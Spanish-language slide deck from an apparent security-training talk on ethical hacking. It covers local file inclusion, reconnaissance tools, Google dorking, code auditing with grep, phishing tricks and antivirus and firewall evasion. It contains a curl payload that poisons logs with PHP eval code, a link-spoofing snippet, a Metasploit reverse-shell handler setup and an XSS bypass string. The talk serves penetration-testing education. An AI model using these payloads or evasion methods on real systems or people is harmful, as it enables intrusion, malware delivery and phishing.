El documento proporciona una guía completa sobre técnicas de hacking ético, incluyendo auditorías de vulnerabilidades y pruebas de penetración, destacando herramientas y métodos de explotación de vulnerabilidades como SQL injection y local file inclusion. También abarca tácticas de evasión de antivirus y firewall, así como el uso de Google hacking para identificar vulnerabilidades en sitios web. Además, se presentan herramientas prácticas y demostraciones para llevar a cabo ataques y defensas en entornos de seguridad informática.

2. HACKING LIKE A BOSS
TIPS Y TRUCOS PARA HACKEAR

3. Roberto Salgado
• Co-founder of Websec
• Provide information security solutions
• Pen-testing, training and monitoring
• Pythonista / Security Researcher
Contacto
• rsalgado@websec.mx
• http://www.websec.mx
• http://www.twitter.com/@LightOS
• http://www.github.com/lightos

4. TEMARIO
• DVWA
• Herramientas para el browser
• Buscar otras entradas de ataque
• Encontrar vulns con auditoria de código
• Phishing
• Evasión de AV
• Evasión de Firewall

5. PENTEST VS AUDITORIA DE
VULNERABILIDADES
• En la auditoría de vulnerabilidades se listan todas las
vulnerabilidades encontradas.
• En la prueba de penetración solo se listan las vulnerabilidades
que se utilizaron para obtener acceso a la información,
haciendo énfasis en el impacto de la explotación y no en la
totalidad de las vulnerabilidades.

6. DAMN VULNERABLE WEB APPLICATION
DVWA es una aplicación web vulnerable a:
• Brute Force
• Command Execution
• Insecure Captcha
• File Inclusion
• SQLi
• SQLi Blind
• Upload
• XSS Reflected
• XSS Stored

7. LOCAL FILE INCLUSION
• LFI es una vulnerabilidad que nos permite leer archivos en un
sistema
• DEMO - http://localhost/lfi.php?file

8. LOCAL FILE INCLUSION
Preferimos RCE:
• access.log
• error.log
• /proc/self/environ
• /proc/self/status
• /proc/{id}/fd/2
• /proc/self/fd/2
• /var/spool/mail

9. LOCAL FILE INCLUSION
curl "http://site.com/index.php?page=
../../../../../../../../proc/self/fd/2&cmd=phpinfo();“
-H "User-Agent: <?php eval($_GET[cmd]); ?>"

10. LOCAL FILE INCLUSION
• RCE No es posible?
• En ese caso tenemos que buscar archivos confidenciales
manualmente
• Buscar archivos de configuración o bitácoras para elevar
nuestro acceso

11. HERRAMIENTAS

12. TOOLS / LFI / PANOPTIC
• Filtrar búsqueda por Sistema Operativo, tipo de archivo (conf o
log), software, etc…
• Opción para guardar los archivos encontrados y quitar el HTML
del archivo
• Soporta hilos, proxy HTML y socks 4/5, user-agent al azar,
etc…

13. TOOLS / LFI / PANOPTIC
• https://github.com/lightos/Panoptic
• git clone https://github.com/lightos/Panoptic.git
• https://github.com/lightos/Panoptic/archive/master.zip

14. TOOLS / PROXY / FIREFOX
• Tamper Data
• Hack Bar
• Burp Suite Pro

15. TOOLS / PROXY / FIREFOX
• Tamper Data --- DEMO
• Hack Bar --- DEMO
• Burp Suite Pro

16. TOOLS / PROXY / CHROME
• Chrome Developer Tools (Ctrl+Shift+I o F12)
• API limitado == No hay equivalente a tamper data
• Burp Suite Pro al rescate!

17. TOOLS / BURPSUITE PRO
• http://portswigger.net/burp/download.html

18. TOOLS / BURPSUITE PRO
• Spider / Crawler
• Live + Escáner Pasivo
• Repeater
• Intruder

19. DEMO

20. TOOLS / FUZZDB
• FUZZDB – Lista de cadenas (strings) para fuzzear
• https://code.google.com/p/fuzzdb/

21. TOOLS / FUZZDB
svn checkout http://fuzzdb.googlecode.com/svn/trunk/
fuzzdb-read-only

22. REVERSE IP LOOKUP
• No encontramos vulnerabilidades/entrada en una pagina
• Hosting compartido?

23. REVERSE IP LOOKUP
• http://www.ip2hosts.com/

26. REVERSE IP LOOKUP
• App de Android
• https://play.google.com/store/apps/details?id=websec.ip2hosts
&hl=es

28. DEMO

30. DNS LOOKUP
• Ataque de diccionario
• Ataque de fuerza bruta (brute force)
• Transferencia de zona
• SOA (Start of Authority) a través de DNS mal configurado

31. DNS LOOKUP
• Fierce - RSnake
• DNSMap - GNUCitizen
• DNS_enum – MSF
• DNS-Discovery
• DNSRecon
• DNSRecord
• DnsWalk

35. GOOGLE HACKING
• Enfocar la búsqueda a nuestra victima
• site: nuestro-objetivo.com.com.mx
• Encontrar archivos, logins, dominios adicionales
• Demo

36. ADMIN FINDER
• Como encontrar la pagina de admin?
• Google dork: admin finder
• Admin finder: ataque de diccionario

38. BUSCANDO VULNS
EN
AUDITORIA DE
CÓDIGO

39. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt

40. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo

41. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo

42. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea

43. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea

44. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás

45. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
• Dos líneas adelante

46. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
• Dos líneas adelante
• Mayúsculas y minúsculas

47. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
• Dos líneas adelante
• Mayúsculas y minúsculas
• Buscar GET o POST

48. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
• Dos líneas adelante
• Mayúsculas y minúsculas
• Buscar GET o POST
• En el directorio actual

49. BUSCANDO VULNS EN PUT IZ A
grep -R -H -n -B 2 -A 2 -i '$_GET|$_POST' . > ../vulns.txt
• Recursivo
• Nombre de archivo
• Numero de línea
• Dos líneas atrás
• Dos líneas adelante
• Mayúsculas y minúsculas
• Buscar GET o POST
• En el directorio actual
• Guardar los resultados a vulns.txt

50. DEMO

51. PHISHING

52. URL SPOOFING
• Pedro Joaquín mostró esta técnica
• <a href="https://www.google.com/"
onmousedown="this.href='http://websec.mx'">https://www.g
oogle.com/</a>

53. DEMO

54. ATAQUES CON UNICODE
• Continuación del rango ASCII
• Left-To-Right Override
• +U202D
• Right-To-Left Override
• +U202E

56. LIVE DEMO

58. PHISHING / TLD INCORRECTO
• Registran .com.mx pero no .com
• .net, .org, .co, .ca, .mx
• www.campus-party.com.mx - Existe
• www.campus-party.net – No existe
• www.campus-party.com – En venta

59. DOMAIN SQUATTING / BIT SQUATTING
• Rayos cósmicos
• Se sobrecalienta el dispositivo
• Pasa unas 600,000 veces al día
Herramienta:
• URLCRAZY

61. MSF AUTOPWNAGE
• Captura de pantalla (screenshot)
• Foto de la Webcam (webcam_snap)
• Información del sistema (sysinfo)
• Obtención de la IP (ipconfig)
• Routing de la red (route)
• Carpeta actual (pwd)
• Listar archivos (ls)
• Dumpear claves (run hashdump)
• Cierra la sesión

62. use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
spool C:UsersLightOSDesktopmsf-output.log
exploit -j

63. LIVE DEMO

64. LIVE DEMO
EN UN MOMENTO…

65. EVASION DE AV

66. EVASIÓN DE ANTIVIRUS
• Dsplit
• Crypters publicos
• XOR Crypter

67. EVASIÓN DE ANTIVIRUS / DSPLIT
• Incrementalmente dividimos el archivo en bytes
• Escaneamos cada archivo generado
• Volvemos a dividir el archivo que es detectado y uno después
• Repetimos el proceso hasta que nos quede 1 byte de diferencia
• Modificamos el byte para cambiar la firma y evadir detección

68. EVASIÓN DE ANTIVIRUS / CRYPTER PUBLICO
• http://foro.udtools.net

69. EVASIÓN DE ANTIVIRUS / CRYPTER XOR
• Herramienta en Python que usa en template en C
• Hace XOR con un random byte y le agrega padding para
cambiar el tamaño
• Carga el shellcode y hace la operación XOR al correr

70. LIVE DEMO

71. EVASION DE FIREWALL
• HTML 5 Security CheatSheet
• http://html5sec.org
• Base de Conocimientos de Inyecciones SQL
• http://www.websec.ca/kb/sql_injection

72. EVASION DE FIREWALL

73. EVASION DE FIREWALL
Meterpreter:
• Usar un reverse TCP
• Usar puertos permitidos: 53, 80, 443

74. EVASION DE FIREWALL
• URL Original:
• index.php?id=1
• URL Modificado:
• index.php?id%00 AQUÍ PODEMOS PONER LO QUE QUERAMOS=1
• Probar Bypasses:
• Index.php?id%00”><script>alert(0)</script>=1

75. SQLMAP TAMPER SCRIPTS
• percentage.py
• space2hash.py
• space2dash.py
• space2morehash.py
• space2mssqlhash.py
• space2mysqldash.py
• space2mssqlblank.py
• charencode.py
• charunicodeencode.py
• chardoubleencode.py

76. FIN
@LIGHTOS
RSALGADO@WEBSEC.MX
HTTP://WWW.WEBSEC.MX